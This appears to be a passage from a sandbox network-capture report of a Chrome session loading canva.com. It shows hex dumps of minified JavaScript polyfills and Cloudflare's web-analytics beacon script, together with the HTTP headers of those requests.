                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20 73 74 61 74 65 22 2b 74 68 69 73 2e 68 29 3b 74 68 69 73 2e 68 3d 65 2c 74 68 69 73 2e 69 3d 74 2c 32 3d 3d 3d 74 68 69 73 2e 68 26 26 74 68 69 73 2e 46 28 29 2c 74 68 69 73 2e 75 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 61 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 2e 41 28 29 29 7b 76 61 72 20 74 3d 73 2e 63 6f 6e 73 6f 6c 65 3b 76 6f 69 64 20 30 21 3d 3d 74 26 26 74 2e 65 72 72 6f 72 28 65 2e 69 29 7d 7d 29 2c 31 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 6f 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 73 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 74 3d 73
                                                                                                                                                                                                                                                                    Data Ascii: eady settled in state"+this.h);this.h=e,this.i=t,2===this.h&&this.F(),this.u()},t.prototype.F=function(){var e=this;a((function(){if(e.A()){var t=s.console;void 0!==t&&t.error(e.i)}}),1)},t.prototype.A=function(){if(this.o)return!1;var e=s.CustomEvent,t=s
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 69 3d 6c 28 65 29 2c 61 3d 69 2e 6e 65 78 74 28 29 3b 21 61 2e 64 6f 6e 65 3b 61 3d 69 2e 6e 65 78 74 28 29 29 72 28 61 2e 76 61 6c 75 65 29 2e 7a 63 28 74 2c 6e 29 7d 29 29 7d 2c 74 2e 61 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 6c 28 65 29 2c 69 3d 6e 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 69 2e 64 6f 6e 65 3f 72 28 5b 5d 29 3a 6e 65 77 20 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6f 5b 74 5d 3d 6e 2c 30 3d 3d 2d 2d 73 26 26 65 28 6f 29 7d 7d 76 61 72 20 6f 3d 5b 5d 2c
                                                                                                                                                                                                                                                                    Data Ascii: ce=function(e){return new t((function(t,n){for(var i=l(e),a=i.next();!a.done;a=i.next())r(a.value).zc(t,n)}))},t.all=function(e){var n=l(e),i=n.next();return i.done?r([]):new t((function(e,t){function a(t){return function(n){o[t]=n,0==--s&&e(o)}}var o=[],
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 74 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 72 28 65 29 26 26 4c 28 65 2c 73 29 26 26 4c 28 65 5b 73 5d 2c 74 68 69 73 2e 67 29 29 26 26 64 65 6c 65 74 65 20 65 5b 73 5d 5b 74 68 69 73 2e 67 5d 7d 2c 74 7d 29 29 2c 75 28 22 4d 61 70 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 52 61 3d 65 2e 6e 65 78 74 3d 65 2e 68 65 61 64 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 67 3b 72 65 74 75 72 6e 20 63 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 29 7b 66 6f 72 28 3b 6e 2e 68 65 61 64 21 3d 65 2e 67 3b 29 6e 3d 6e 2e 52 61 3b 66 6f 72 28 3b 6e 2e 6e 65
                                                                                                                                                                                                                                                                    Data Ascii: t.prototype.delete=function(e){return!!(r(e)&&L(e,s)&&L(e[s],this.g))&&delete e[s][this.g]},t})),u("Map",(function(e){function t(){var e={};return e.Ra=e.next=e.head=e}function n(e,t){var n=e.g;return c((function(){if(n){for(;n.head!=e.g;)n=n.Ra;for(;n.ne
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 2e 6c 69 73 74 2e 70 75 73 68 28 6e 2e 65 6e 74 72 79 29 2c 74 68 69 73 2e 67 2e 52 61 2e 6e 65 78 74 3d 6e 2e 65 6e 74 72 79 2c 74 68 69 73 2e 67 2e 52 61 3d 6e 2e 65 6e 74 72 79 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 2c 74 68 69 73 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 28 21 28 65 3d 72 28 74 68 69 73 2c 65 29 29 2e 65 6e 74 72 79 7c 7c 21 65 2e 6c 69 73 74 29 26 26 28 65 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 65 2e 69 6e 64 65 78 2c 31 29 2c 65 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 2e 68 5b 65 2e 69 64 5d 2c 65 2e 65 6e 74 72 79 2e 52 61 2e 6e 65 78 74 3d 65 2e 65 6e 74 72 79 2e 6e 65 78 74 2c 65 2e 65 6e 74 72 79 2e 6e 65 78 74 2e 52
                                                                                                                                                                                                                                                                    Data Ascii: .list.push(n.entry),this.g.Ra.next=n.entry,this.g.Ra=n.entry,this.size++),this},i.prototype.delete=function(e){return!(!(e=r(this,e)).entry||!e.list)&&(e.list.splice(e.index,1),e.list.length||delete this.h[e.id],e.entry.Ra.next=e.entry.next,e.entry.next.R


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    20192.168.2.1249738104.16.79.73443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC614OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:33 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                    Content-Length: 19948
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                    ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e5950e13db3238a-EWR
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
                                                                                                                                                                                                                                                                    Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 72 20 69 3d 6e 28 36 39 39 29 2c 6f 3d 6e 28 37 35 32 29 2c 61 3d 6e 28 31 30 34 29 2c 63 3d 6e 28 35 30 38 29 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 61 72 20 74 3d 22 22 3b 69 66 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 3f 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 3a 22 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2c 22 3a 2f 2f 22 29 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 2c 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 66 28 30 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 29 74 2b 3d 65 3b 65 6c 73 65 20 74 72 79 7b 76 61
                                                                                                                                                                                                                                                                    Data Ascii: r i=n(699),o=n(752),a=n(104),c=n(508);!function(){function e(e){var t="";if(t=window.location.origin?window.location.origin:"".concat(window.location.protocol,"://").concat(window.location.host),e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{va
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 29 3d 3d 74 26 26 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 74 72 69 67 67 65 72 65 64 29 7c 7c 50 28 29 2c 5f 28 74 29 7d 21 62 26 26 77 26 26 28 62 3d 21 30 2c 42 28 29 29 7d 65 6c 73 65 22 76 69 73 69 62 6c 65 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 26 26 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 29 29 3b 76 61 72 20 45 3d 7b 7d 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 26 26 28 28 30 2c 61 2e 6f 6e 4c 43 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 46 49 44 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 46 43 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 49 4e 50 29 28 78 29 2c 28 30 2c 61 2e 6f 6e 54 54 46 42 29 28 78 29 2c
                                                                                                                                                                                                                                                                    Data Ascii: )==t&&(null==w?void 0:w.triggered)||P(),_(t)}!b&&w&&(b=!0,B())}else"visible"===document.visibilityState&&(new Date).getTime()}));var E={};"function"==typeof PerformanceObserver&&((0,a.onLCP)(x),(0,a.onFID)(x),(0,a.onFCP)(x),(0,a.onINP)(x),(0,a.onTTFB)(x),
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 2c 70 26 26 28 28 30 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 29 28 22 22 2c 61 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 21 31 2c 43 29 2c 76 6f 69 64 20 30 21 3d 3d 70 2e 66 6f 72 77 61 72 64 26 26 76 6f 69 64 20 30 21 3d 3d 70 2e 66 6f 72 77 61 72 64 2e 75 72 6c 26 26 28 30 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 29 28 22 22 2c 61 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 21 31 2c 70 2e 66 6f 72 77 61 72 64 2e 75 72 6c 29 29 29 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 5b 30 5d 2c 6e 3d 22 22 3b 74 72 79 7b 6e 3d 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                    Data Ascii: ,p&&((0,o.sendObjectBeacon)("",a,(function(){}),!1,C),void 0!==p.forward&&void 0!==p.forward.url&&(0,o.sendObjectBeacon)("",a,(function(){}),!1,p.forward.url)))},B=function(){var t=function(){var t=s.getEntriesByType("navigation")[0],n="";try{n="function"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 28 6f 2c 61 2c 63 29 7b 6e 3d 65 28 63 29 3b 76 61 72 20 75 3d 65 28 29 2c 73 3d 21 30 3b 72 65 74 75 72 6e 20 6e 3d 3d 75 26 26 28 73 3d 21 31 29 2c 73 26 26 28 41 28 29 26 26 28 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 75 72 6c 29 3d 3d 75 26 26 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 74 72 69 67 67 65 72 65 64 29 7c 7c 50 28 75 29 2c 5f 28 75 29 29 2c 69 28 29 29 2c 72 2e 61 70 70 6c 79 28 74 2c 5b 6f 2c 61 2c 63 5d 29 7d 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 6f 70 73 74 61 74 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 41 28 29 26 26 28 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 75 72 6c 29 3d 3d 6e 26 26 28 6e 75 6c 6c 3d 3d 77 3f 76 6f 69 64 20 30 3a 77 2e 74 72 69
                                                                                                                                                                                                                                                                    Data Ascii: (o,a,c){n=e(c);var u=e(),s=!0;return n==u&&(s=!1),s&&(A()&&((null==w?void 0:w.url)==u&&(null==w?void 0:w.triggered)||P(u),_(u)),i()),r.apply(t,[o,a,c])},window.addEventListener("popstate",(function(t){A()&&((null==w?void 0:w.url)==n&&(null==w?void 0:w.tri
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 45 2e 69 6e 70 2e 65 6c 65 6d 65 6e 74 3d 63 2e 65 76 65 6e 74 54 61 72 67 65 74 2c 45 2e 69 6e 70 2e 6e 61 6d 65 3d 63 2e 65 76 65 6e 74 54 79 70 65 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 72 65 74 75 72 6e 20 73 2e 74 69 6d 65 4f 72 69 67 69 6e 7d 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 69 66 28 70 26 26 70 2e 73 65 72 76 65 72 54 69 6d 69 6e 67 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 30 2c 6e 3d 5b 22 6e 61 76 69 67 61 74 69 6f 6e 22 2c 22 72 65 73 6f 75 72 63 65 22 5d 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 72 3d 6e 5b 74 5d 2c 69 3d 30 2c 6f 3d 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 72 29 3b 69 3c 6f 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 6f 5b 69 5d 2c 63 3d 61
                                                                                                                                                                                                                                                                    Data Ascii: E.inp.element=c.eventTarget,E.inp.name=c.eventType))}}function F(){return s.timeOrigin}function I(){if(p&&p.serverTiming){for(var e=[],t=0,n=["navigation","resource"];t<n.length;t++)for(var r=n[t],i=0,o=s.getEntriesByType(r);i<o.length;i++){var a=o[i],c=a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 29 7d 28 29 7d 2c 37 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 74 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 3d 76 6f 69 64 20 30 2c 74 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 21 31 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 69 7c 7c 28 74 2e 73 69 74 65 54 6f 6b 65 6e 26 26 74 2e 76 65 72 73 69 6f 6e 73 2e 66 6c 3f 22 2f 63 64 6e 2d 63 67 69 2f 72 75 6d 3f 22 2e 63 6f 6e 63 61 74 28 65 29 3a 22 2f 63 64 6e 2d 63 67 69 2f 62 65 61 63 6f 6e 2f 70 65 72 66 6f 72 6d 61 6e 63 65 3f 22 2e 63 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: )}()},752:function(e,t){"use strict";t.__esModule=!0,t.sendObjectBeacon=void 0,t.sendObjectBeacon=function(e,t,n,r,i){void 0===r&&(r=!1),void 0===i&&(i=null);var o=i||(t.siteToken&&t.versions.fl?"/cdn-cgi/rum?".concat(e):"/cdn-cgi/beacon/performance?".con
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 29 72 65 74 75 72 6e 22 6c 6f 61 64 69 6e 67 22 3b 76 61 72 20 74 3d 61 28 29 3b 69 66 28 74 29 7b 69 66 28 65 3c 74 2e 64 6f 6d 49 6e 74 65 72 61 63 74 69 76 65 29 72 65 74 75 72 6e 22 6c 6f 61 64 69 6e 67 22 3b 69 66 28 30 3d 3d 3d 74 2e 64 6f 6d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 45 76 65 6e 74 53 74 61 72 74 7c 7c 65 3c 74 2e 64 6f 6d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 45 76 65 6e 74 53 74 61 72 74 29 72 65 74 75 72 6e 22 64 6f 6d 2d 69 6e 74 65 72 61 63 74 69 76 65 22 3b 69 66 28 30 3d 3d 3d 74 2e 64 6f 6d 43 6f 6d 70 6c 65 74 65 7c 7c 65 3c 74 2e 64 6f 6d 43 6f 6d 70 6c 65 74 65 29 72 65 74 75 72 6e 22 64 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 6f 61 64 65 64 22 7d 72
                                                                                                                                                                                                                                                                    Data Ascii: ing"===document.readyState)return"loading";var t=a();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 65 29 7b 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 65 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 29 29 7d 29 29 3b 72 65 74 75 72 6e 20 72 2e 6f 62 73 65 72 76 65 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 74 79 70 65 3a 65 2c 62 75 66 66 65 72 65 64 3a 21 30 7d 2c 6e 7c 7c 7b 7d 29 29 2c 72 7d 7d 63 61 74 63 68 28 65 29 7b 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 2e 76 61 6c 75 65 3e 3d 30 26 26 28 61 7c 7c 72 29 26 26 28 28 6f 3d 74 2e 76 61 6c 75 65 2d 28 69 7c 7c 30 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 29 26 26 28 69 3d 74 2e 76 61 6c 75 65 2c 74 2e 64 65 6c 74
                                                                                                                                                                                                                                                                    Data Ascii: e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},g=function(e,t,n,r){var i,o;return function(a){t.value>=0&&(a||r)&&((o=t.value-(i||0))||void 0===i)&&(i=t.value,t.delt
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC1369INData Raw: 7b 7d 2c 50 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 72 3d 43 28 29 2c 69 3d 70 28 22 46 43 50 22 29 2c 6f 3d 6d 28 22 70 61 69 6e 74 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 2e 6e 61 6d 65 26 26 28 6f 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 73 74 61 72 74 54 69 6d 65 3c 72 2e 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 26 26 28 69 2e 76 61 6c 75 65 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 73 74 61 72 74 54 69 6d 65 2d 76 28 29 2c 30 29 2c 69 2e 65 6e 74 72 69 65 73 2e 70 75 73 68 28 65 29 2c 6e 28 21 30 29 29 29 7d 29 29 7d 29 29 3b 6f 26 26 28 6e 3d 67 28 65 2c 69 2c 42 2c 74 2e
                                                                                                                                                                                                                                                                    Data Ascii: {},P((function(){var n,r=C(),i=p("FCP"),o=m("paint",(function(e){e.forEach((function(e){"first-contentful-paint"===e.name&&(o.disconnect(),e.startTime<r.firstHiddenTime&&(i.value=Math.max(e.startTime-v(),0),i.entries.push(e),n(!0)))}))}));o&&(n=g(e,i,B,t.


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    21192.168.2.1249741104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC806OUTGET /web/62d716053c361585.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 170
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e84cbd43fb-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1240810
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "1e93961f82c3ddd2442d55c103ad0215"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 05:56:50 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Wed, 15 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: zl5oTqGF5E2RWNnEVKL6jW61XMNKOAGjfGpU1Py0zdzoGI31AVj/ySqjA+q8yOpxblAYf8NCBYY=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HVHZPSDA9GADDYMX
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: DucQRYiynloWIDGxi0vyyhBzqpYWCfuc
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
